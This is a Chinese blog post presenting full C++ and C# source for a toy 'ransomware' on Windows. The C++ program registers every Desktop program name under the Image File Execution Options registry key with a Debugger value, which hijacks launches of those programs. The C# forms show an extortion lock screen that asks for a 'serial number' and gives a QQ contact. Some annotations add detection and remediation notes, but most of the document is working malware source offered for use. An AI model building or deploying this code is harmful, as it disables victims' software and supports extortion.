基于windows下的映像劫持实现“勒索病毒”



## 什么是映像劫持?

关于映像劫持,我曾经在博客中给大家讲过,在此就不再阐述了。简单来说,它依赖注册表 Image File Execution Options 键下的 Debugger 值:系统启动同名程序时会改为启动该值指定的程序,因此这个键也是安全软件和 EDR 重点监控的位置。

## 什么是勒索病毒?

勒索病毒,是一种新型电脑病毒,主要以邮件、程序木马、网页挂马的形式进行传播。该病毒性质恶劣、危害极大,一旦感染将给用户带来无法估量的损失。这种病毒利用各种加密算法对文件进行加密,被感染者一般无法解密,必须拿到解密的私钥才有可能破解。

而我们这里,仅仅只是利用映像劫持技术,让用户的正常软件无法打开,从而实现勒索目的。


## C/C++ 实现映像劫持源代码


#include "shlobj.h" 
#include <iostream>
#include <string>
#include <list>
#include <vector>
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#include <io.h>
using namespace std;
// Collects the name of every file under the current user's Desktop
// (recursively) into FileName. The walk itself is ordinary Win32 directory
// enumeration; main() later turns each collected name into an Image File
// Execution Options subkey.
// NOTE(review): char buffers passed to WIN32_FIND_DATA/FindFirstFile only
// compile in a non-UNICODE (MBCS) build — confirm the project settings.
class Hacker {
public:
// Resolves the desktop path and fills FileName immediately on construction.
Hacker()
{
Path = this->getDesktopPath();
GetAllgpxFilepathFromfolder(Path);
}
private:
string Path; // desktop directory as returned by getDesktopPath()
public:
list<string> FileName; // bare file names, no directory part (see GetAllgpxFilepathFromfolder)
private:
// Returns the desktop folder path via the shell (CSIDL_DESKTOP).
// szDir is written only when both shell calls succeed; on any failure the
// function still returns string(szDir), i.e. the contents of an
// uninitialized buffer. The return value of SHGetPathFromIDListA is ignored.
// NOTE(review): SHGetPathFromIDListA expects a MAX_PATH-sized buffer while
// szDir holds 200 bytes — presumably enough for typical desktop paths, but
// not guaranteed.
string getDesktopPath() // get the desktop path
{
LPITEMIDLIST pidl;
LPMALLOC pShellMalloc;
char szDir[200];
if (SUCCEEDED(SHGetMalloc(&pShellMalloc)))
{
if (SUCCEEDED(SHGetSpecialFolderLocation(NULL, CSIDL_DESKTOP, &pidl))) {
// returns true on success
SHGetPathFromIDListA(pidl, szDir);
pShellMalloc->Free(pidl);
}
pShellMalloc->Release();
}

return string(szDir);
}

private:
// Recursively walks `Path` with the "*.*" pattern and appends the bare name
// of every non-directory entry to FileName (despite the "gpx" in the name,
// no extension filter is applied). Returns -1 if FindFirstFile fails for
// `Path`, otherwise 0; failures inside nested directories are not propagated.
// Path building uses strcpy/strcat into MAX_PATH stack buffers with no
// length check, so long or deeply nested paths overflow them.
int GetAllgpxFilepathFromfolder(string Path)
{
char szFind[MAX_PATH];
WIN32_FIND_DATA FindFileData;
strcpy(szFind, Path.c_str());
strcat(szFind, "\\*.*");
HANDLE hFind = FindFirstFile(szFind, &FindFileData);
if (INVALID_HANDLE_VALUE == hFind) return -1;
do
{
if (FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
{
if (strcmp(FindFileData.cFileName, ".") != 0 && strcmp(FindFileData.cFileName, "..") != 0)
{
// found a subdirectory, recurse into it
char szFile[MAX_PATH] = { 0 };
strcpy(szFile, Path.c_str());
strcat(szFile, "\\");
strcat(szFile, FindFileData.cFileName);
GetAllgpxFilepathFromfolder(szFile);
}
}else{
// only the file name is kept; the directory it was found in is dropped
FileName.push_back(FindFileData.cFileName);
}
} while (FindNextFile(hFind, &FindFileData));
FindClose(hFind);
return 0;
}
};

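/// Replaces every non-overlapping occurrence of `A` in `S` with `B`, in place.
///
/// @param S  string edited in place
/// @param A  pattern to look for; an empty pattern is a no-op (the original
///           inserted `B` at every position and never terminated)
/// @param B  replacement text; it may contain `A`, because the search resumes
///           after the inserted text rather than one character past the match
void replaceA_to_B(std::string& S, const std::string& A, const std::string& B) {
    if (A.empty()) return;
    std::size_t found = S.find(A);
    while (std::string::npos != found) {
        S.replace(found, A.length(), B);
        // Resume after the replacement: a `B` that contains `A` would
        // otherwise be re-matched forever.
        found = S.find(A, found + B.length());
    }
}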
// Entry point. Every file name found under the Desktop is registered as a
// subkey of Image File Execution Options with a Debugger value, so launching
// a program of that name starts the named "debugger" instead — the effect
// the page describes above. Nothing here encrypts anything.
//
// Defender notes:
//  * HKLM writes need an elevated process; otherwise reg.exe fails, and the
//    return value of system() is never checked.
//  * Each iteration spawns cmd.exe -> reg.exe with the full IFEO path on the
//    command line and creates a new IFEO subkey holding a Debugger value, so
//    process-creation and registry-value-set telemetry (e.g. Sysmon event
//    IDs 1 and 13) capture both.
//  * Remediation is deleting the Debugger value (or the whole subkey) for
//    each affected program name under that key.
int main()
{
// Heap-allocated and never deleted; lives for the whole process.
Hacker* one = new Hacker();
string arr;
// Normalize names: "x.lnk" becomes "x.exe", and anything after the first
// ".exe" is dropped. Names without ".exe" are left untouched but are still
// registered in the second loop.
for (list<string>::iterator itor = one->FileName.begin(); itor != one->FileName.end(); itor++)
{
replaceA_to_B(*itor, ".lnk", ".exe");
int pos = 0;
// find() returns size_t; npos converted to int is -1 on the usual Windows targets
pos =(*itor).find(".exe");
if (-1 != pos)
{
*itor = (*itor).substr(0, pos+4); // keep up to and including ".exe"
}
}
// "勒索病毒名称.exe" is the author's placeholder for the image name that
// will be started in place of each listed program.
for (list<string>::iterator itor = one->FileName.begin(); itor != one->FileName.end(); itor++)
{
arr = "REG ADD \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\" + *itor + "\"" + " /v Debugger /t REG_SZ /d \"勒索病毒名称.exe\" /f";
system(arr.c_str());
}
system("pause"); // wait for a key press before exiting
return 0;
}


# 基于 C# 实现勒索病毒:


##### Form1.Designer.cs:

namespace Extortion_virus
{
// Designer-generated half of the lock-screen form (Form1). The only event
// wired in this file is button1.Click -> button1_Click ("Unlock"); the
// on-screen message is split across label1..label4.
partial class Form1
{
/// <summary>
/// Required designer variable.
/// </summary>
private System.ComponentModel.IContainer components = null;

/// <summary>
/// Clean up any resources being used.
/// </summary>
/// <param name="disposing">true if managed resources should be disposed; otherwise, false.</param>
protected override void Dispose(bool disposing)
{
if (disposing && (components != null))
{
components.Dispose();
}
base.Dispose(disposing);
}

#region Windows 窗体设计器生成的代码

/// <summary>
/// Required method for Designer support - do not modify
/// the contents of this method with the code editor.
/// </summary>
private void InitializeComponent()
{
System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(Form1));
this.pictureBox1 = new System.Windows.Forms.PictureBox();
this.label1 = new System.Windows.Forms.Label();
this.label2 = new System.Windows.Forms.Label();
this.label3 = new System.Windows.Forms.Label();
this.label4 = new System.Windows.Forms.Label();
this.button1 = new System.Windows.Forms.Button();
this.backgroundWorker1 = new System.ComponentModel.BackgroundWorker();
((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).BeginInit();
this.SuspendLayout();
//
// pictureBox1
//
this.pictureBox1.BackColor = System.Drawing.Color.Yellow;
this.pictureBox1.Image = ((System.Drawing.Image)(resources.GetObject("pictureBox1.Image")));
this.pictureBox1.Location = new System.Drawing.Point(0, -1);
this.pictureBox1.Name = "pictureBox1";
this.pictureBox1.Size = new System.Drawing.Size(515, 302);
this.pictureBox1.TabIndex = 0;
this.pictureBox1.TabStop = false;
//
// label1
//
this.label1.AutoSize = true;
this.label1.BackColor = System.Drawing.Color.Turquoise;
this.label1.Font = new System.Drawing.Font("楷体", 21.75F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(134)));
this.label1.ForeColor = System.Drawing.Color.DarkOrange;
this.label1.Location = new System.Drawing.Point(125, 29);
this.label1.Name = "label1";
this.label1.Size = new System.Drawing.Size(253, 29);
this.label1.TabIndex = 1;
this.label1.Text = "Extortion virus";
//
// label2
//
this.label2.AutoSize = true;
this.label2.Font = new System.Drawing.Font("楷体", 12.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(134)));
this.label2.ForeColor = System.Drawing.Color.Chartreuse;
this.label2.Location = new System.Drawing.Point(52, 88);
this.label2.Name = "label2";
this.label2.Size = new System.Drawing.Size(422, 17);
this.label2.TabIndex = 2;
this.label2.Text = "Your computer is paralyzed and unable to work.";
//
// label3
//
this.label3.AutoSize = true;
this.label3.Font = new System.Drawing.Font("楷体", 13F);
this.label3.ForeColor = System.Drawing.Color.Chartreuse;
this.label3.Location = new System.Drawing.Point(52, 119);
this.label3.Name = "label3";
this.label3.Size = new System.Drawing.Size(422, 18);
this.label3.TabIndex = 3;
this.label3.Text = " If you need to continue to use your computer,";
//
// label4
//
this.label4.AutoSize = true;
this.label4.Font = new System.Drawing.Font("楷体", 12.75F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(134)));
this.label4.ForeColor = System.Drawing.Color.Chartreuse;
this.label4.Location = new System.Drawing.Point(152, 161);
this.label4.Name = "label4";
this.label4.Size = new System.Drawing.Size(188, 17);
this.label4.TabIndex = 4;
this.label4.Text = "please click unlock.";
//
// button1
//
this.button1.BackColor = System.Drawing.SystemColors.GradientActiveCaption;
this.button1.Font = new System.Drawing.Font("楷体", 25F);
this.button1.ForeColor = System.Drawing.Color.Crimson;
this.button1.Location = new System.Drawing.Point(150, 232);
this.button1.Name = "button1";
this.button1.Size = new System.Drawing.Size(190, 52);
this.button1.TabIndex = 5;
this.button1.Text = "Unlock";
this.button1.UseVisualStyleBackColor = false;
// Sole event subscription in this file.
this.button1.Click += new System.EventHandler(this.button1_Click);
//
// Form1
//
this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F);
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
this.ClientSize = new System.Drawing.Size(515, 296);
this.Controls.Add(this.button1);
this.Controls.Add(this.label4);
this.Controls.Add(this.label3);
this.Controls.Add(this.label2);
this.Controls.Add(this.label1);
this.Controls.Add(this.pictureBox1);
this.Name = "Form1";
this.Text = "Form1";
((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).EndInit();
this.ResumeLayout(false);
this.PerformLayout();

}

#endregion

private System.Windows.Forms.PictureBox pictureBox1;
private System.Windows.Forms.Label label1;
private System.Windows.Forms.Label label2;
private System.Windows.Forms.Label label3;
private System.Windows.Forms.Label label4;
private System.Windows.Forms.Button button1;
// Created in InitializeComponent but never used anywhere on this page.
private System.ComponentModel.BackgroundWorker backgroundWorker1;
}
}

##### Form1.cs:

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;

namespace Extortion_virus
{
// Lock-screen form shown first: centered, hidden from the taskbar, with no
// control box or minimize/maximize buttons, so it cannot be closed from its
// own chrome. The "Unlock" button hides this form and opens Form2.
public partial class Form1 : Form
{
public Form1()
{
InitializeComponent();
// The form sees key events before its controls do. Note that no KeyDown
// subscription for Form1_KeyDown appears in this file or in the designer
// code shown on this page.
KeyPreview = true;
this.ShowInTaskbar = false;
ControlBox = false;
this.MaximizeBox = false;
this.MinimizeBox = false;
this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
this.Text = "Extortion virus";
// None is overridden on the very next line, so the effective border
// style is FixedSingle.
this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.None;
FormBorderStyle = FormBorderStyle.FixedSingle;
// Labels are re-parented onto the picture box so their transparent
// background shows the image behind them.
pictureBox1.BackColor = Color.Transparent;
label1.BackColor = Color.Transparent;
label1.Parent = pictureBox1;

label2.BackColor = Color.Transparent;
label2.Parent = pictureBox1;

label3.BackColor = Color.Transparent;
label3.Parent = pictureBox1;

label4.BackColor = Color.Transparent;
label4.Parent = pictureBox1;

}
// Shows a message box for a few key combinations. It sets neither e.Handled
// nor e.SuppressKeyPress, so no key is actually blocked. Ctrl+Alt+Del is the
// secure attention sequence handled by winlogon and is never delivered to a
// user-mode window's KeyDown at all. Each condition also compares the same
// e.Modifiers value against two different keys (and the Win keys are key
// codes, not modifier flags), so none of these branches can fire as written.
private void Form1_KeyDown(object sender, KeyEventArgs e)
{
if (e.Modifiers == Keys.Control && e.KeyCode == Keys.Delete && e.Modifiers ==Keys.Alt)
{
MessageBox.Show("You cannot open task manager now.");
}
if ((e.Modifiers == Keys.LWin || e.Modifiers == Keys.RWin) && e.Modifiers == Keys.R)
{
MessageBox.Show("You are prohibited from running the process now.");
}
if (e.Modifiers == Keys.RWin || e.Modifiers == Keys.LWin) {
MessageBox.Show("You are not allowed to do anything.");
}
if (e.Modifiers == Keys.Alt && e.Modifiers == Keys.F4)
{
MessageBox.Show("Sorry, I really don't want to see you do this.");
}
}
// "Unlock": hides (does not close) this form and shows Form2, so the
// process keeps running.
private void button1_Click(object sender, EventArgs e)
{
this.Hide();
Form2 f2 = new Form2();
f2.Show();
}
}
}

##### Form2.Designer.cs:

namespace Extortion_virus
{
// Designer-generated half of the "serial number" form (Form2). Events wired
// here: button1.Click -> button1_Click ("clear") and button2.Click ->
// button2_Click ("submit"). label2 carries the contact handle shown to the
// user, which is also the string Form2.button2_Click compares input against.
partial class Form2
{
/// <summary>
/// Required designer variable.
/// </summary>
private System.ComponentModel.IContainer components = null;

/// <summary>
/// Clean up any resources being used.
/// </summary>
/// <param name="disposing">true if managed resources should be disposed; otherwise, false.</param>
protected override void Dispose(bool disposing)
{
if (disposing && (components != null))
{
components.Dispose();
}
base.Dispose(disposing);
}

#region Windows Form Designer generated code

/// <summary>
/// Required method for Designer support - do not modify
/// the contents of this method with the code editor.
/// </summary>
private void InitializeComponent()
{
System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(Form2));
this.pictureBox1 = new System.Windows.Forms.PictureBox();
this.label1 = new System.Windows.Forms.Label();
this.label2 = new System.Windows.Forms.Label();
this.richTextBox1 = new System.Windows.Forms.RichTextBox();
this.label3 = new System.Windows.Forms.Label();
this.label4 = new System.Windows.Forms.Label();
this.label5 = new System.Windows.Forms.Label();
this.label6 = new System.Windows.Forms.Label();
this.label7 = new System.Windows.Forms.Label();
this.button1 = new System.Windows.Forms.Button();
this.button2 = new System.Windows.Forms.Button();
((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).BeginInit();
this.SuspendLayout();
//
// pictureBox1
//
this.pictureBox1.Image = ((System.Drawing.Image)(resources.GetObject("pictureBox1.Image")));
this.pictureBox1.Location = new System.Drawing.Point(1, 0);
this.pictureBox1.Name = "pictureBox1";
this.pictureBox1.Size = new System.Drawing.Size(536, 306);
this.pictureBox1.TabIndex = 0;
this.pictureBox1.TabStop = false;
//
// label1
//
this.label1.AutoSize = true;
this.label1.BackColor = System.Drawing.Color.WhiteSmoke;
this.label1.Font = new System.Drawing.Font("楷体", 15F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(134)));
this.label1.ForeColor = System.Drawing.SystemColors.MenuHighlight;
this.label1.Location = new System.Drawing.Point(72, 29);
this.label1.Name = "label1";
this.label1.Size = new System.Drawing.Size(427, 20);
this.label1.TabIndex = 1;
this.label1.Text = "Please input your poison serial number";
//
// label2
//
this.label2.AutoSize = true;
this.label2.BackColor = System.Drawing.SystemColors.GrayText;
this.label2.Font = new System.Drawing.Font("宋体", 15F, System.Drawing.FontStyle.Bold);
this.label2.ForeColor = System.Drawing.SystemColors.MenuHighlight;
this.label2.Location = new System.Drawing.Point(12, 70);
this.label2.Name = "label2";
this.label2.Size = new System.Drawing.Size(559, 20);
this.label2.TabIndex = 2;
// The digits displayed here are the same literal button2_Click accepts,
// so the "serial" is visible on screen and as plaintext in the binary.
this.label2.Text = "if not, please contact QQ: \"1152193204\" to get it.";
//
// richTextBox1
//
this.richTextBox1.Location = new System.Drawing.Point(169, 142);
this.richTextBox1.Name = "richTextBox1";
this.richTextBox1.Size = new System.Drawing.Size(282, 116);
this.richTextBox1.TabIndex = 3;
this.richTextBox1.Text = "";
//
// label3
//
this.label3.AutoSize = true;
this.label3.Font = new System.Drawing.Font("宋体", 15F, System.Drawing.FontStyle.Bold);
this.label3.ForeColor = System.Drawing.Color.Goldenrod;
this.label3.Location = new System.Drawing.Point(104, 142);
this.label3.Name = "label3";
this.label3.Size = new System.Drawing.Size(30, 20);
this.label3.TabIndex = 4;
this.label3.Text = "解";
//
// label4
//
this.label4.AutoSize = true;
this.label4.Font = new System.Drawing.Font("宋体", 15F, System.Drawing.FontStyle.Bold);
this.label4.ForeColor = System.Drawing.Color.Goldenrod;
this.label4.Location = new System.Drawing.Point(104, 171);
this.label4.Name = "label4";
this.label4.Size = new System.Drawing.Size(30, 20);
this.label4.TabIndex = 5;
this.label4.Text = "密";
//
// label5
//
this.label5.AutoSize = true;
this.label5.Font = new System.Drawing.Font("宋体", 15F, System.Drawing.FontStyle.Bold);
this.label5.ForeColor = System.Drawing.Color.Goldenrod;
this.label5.Location = new System.Drawing.Point(104, 198);
this.label5.Name = "label5";
this.label5.Size = new System.Drawing.Size(30, 20);
this.label5.TabIndex = 6;
this.label5.Text = "序";
//
// label6
//
this.label6.AutoSize = true;
this.label6.Font = new System.Drawing.Font("宋体", 15F, System.Drawing.FontStyle.Bold);
this.label6.ForeColor = System.Drawing.Color.Goldenrod;
this.label6.Location = new System.Drawing.Point(104, 226);
this.label6.Name = "label6";
this.label6.Size = new System.Drawing.Size(30, 20);
this.label6.TabIndex = 7;
this.label6.Text = "列";
//
// label7
//
this.label7.AutoSize = true;
this.label7.Font = new System.Drawing.Font("宋体", 15F, System.Drawing.FontStyle.Bold);
this.label7.ForeColor = System.Drawing.Color.Goldenrod;
this.label7.Location = new System.Drawing.Point(104, 254);
this.label7.Name = "label7";
this.label7.Size = new System.Drawing.Size(30, 20);
this.label7.TabIndex = 8;
this.label7.Text = "号";
//
// button1
//
this.button1.Font = new System.Drawing.Font("宋体", 10F);
this.button1.Location = new System.Drawing.Point(281, 264);
this.button1.Name = "button1";
this.button1.Size = new System.Drawing.Size(75, 23);
this.button1.TabIndex = 9;
this.button1.Text = "clear";
this.button1.UseVisualStyleBackColor = true;
this.button1.Click += new System.EventHandler(this.button1_Click);
//
// button2
//
this.button2.Font = new System.Drawing.Font("宋体", 10F);
this.button2.Location = new System.Drawing.Point(376, 264);
this.button2.Name = "button2";
this.button2.Size = new System.Drawing.Size(75, 23);
this.button2.TabIndex = 10;
this.button2.Text = "submit";
this.button2.UseVisualStyleBackColor = true;
this.button2.Click += new System.EventHandler(this.button2_Click);
//
// Form2
//
this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F);
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
this.ClientSize = new System.Drawing.Size(537, 303);
this.Controls.Add(this.button2);
this.Controls.Add(this.button1);
this.Controls.Add(this.label7);
this.Controls.Add(this.label6);
this.Controls.Add(this.label5);
this.Controls.Add(this.label4);
this.Controls.Add(this.label3);
this.Controls.Add(this.richTextBox1);
this.Controls.Add(this.label2);
this.Controls.Add(this.label1);
this.Controls.Add(this.pictureBox1);
this.Name = "Form2";
this.Text = "Form2";
((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).EndInit();
this.ResumeLayout(false);
this.PerformLayout();

}

#endregion

private System.Windows.Forms.PictureBox pictureBox1;
private System.Windows.Forms.Label label1;
private System.Windows.Forms.Label label2;
private System.Windows.Forms.RichTextBox richTextBox1;
private System.Windows.Forms.Label label3;
private System.Windows.Forms.Label label4;
private System.Windows.Forms.Label label5;
private System.Windows.Forms.Label label6;
private System.Windows.Forms.Label label7;
private System.Windows.Forms.Button button1;
private System.Windows.Forms.Button button2;
}
}

##### Form2.cs:

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;

namespace Extortion_virus
{
// "Serial number" form opened by Form1's Unlock button. Same window setup as
// Form1 (centered, no taskbar entry, no control box). Submitting only shows a
// message box in either branch — there is no unlock or restore logic here.
public partial class Form2 : Form
{
public Form2()
{
InitializeComponent();
this.ShowInTaskbar = false;
ControlBox = false;
this.MaximizeBox = false;
this.MinimizeBox = false;
this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
this.Text = "Extortion virus";
// None is overridden on the next line; the effective style is FixedSingle.
this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.None;
FormBorderStyle = FormBorderStyle.FixedSingle;
// Labels are re-parented onto the picture box so their transparent
// background shows the image behind them.
pictureBox1.BackColor = Color.Transparent;
label1.BackColor = Color.Transparent;
label1.Parent = pictureBox1;

label2.BackColor = Color.Transparent;
label2.Parent = pictureBox1;

label3.BackColor = Color.Transparent;
label3.Parent = pictureBox1;

label4.BackColor = Color.Transparent;
label4.Parent = pictureBox1;

label5.BackColor = Color.Transparent;
label5.Parent = pictureBox1;

label6.BackColor = Color.Transparent;
label6.Parent = pictureBox1;

label7.BackColor = Color.Transparent;
label7.Parent = pictureBox1;
}

// "clear": empties the input box.
private void button1_Click(object sender, EventArgs e)
{
richTextBox1.Clear();
}

// "submit": compares the input with a hard-coded plaintext literal (the same
// digits label2 displays in Form2.Designer.cs). Both outcomes are just a
// message box; the accepted path explicitly says nothing is restored.
private void button2_Click(object sender, EventArgs e)
{
if (richTextBox1.Text == "1152193204") {
MessageBox.Show("Thank you for buying our service, but your computer will not return to normal.");
}
else {
MessageBox.Show("Your serial number is wrong. Please try again.");
}
}
}
}

### 代码执行后效果图

基于windows下的映像劫持实现“勒索病毒”_C/C++

这里由于 C# 比 C++ 开发快捷,故使用了 C# 的 WinForm。在此我只设置了 WinForm 程序在任务栏隐藏、不允许调整大小、移除关闭按钮,并检测用户按键。

如果需要更好的效果,可以把两个程序合在一起,使用 MFC 或者 Qt 来实现同样的效果。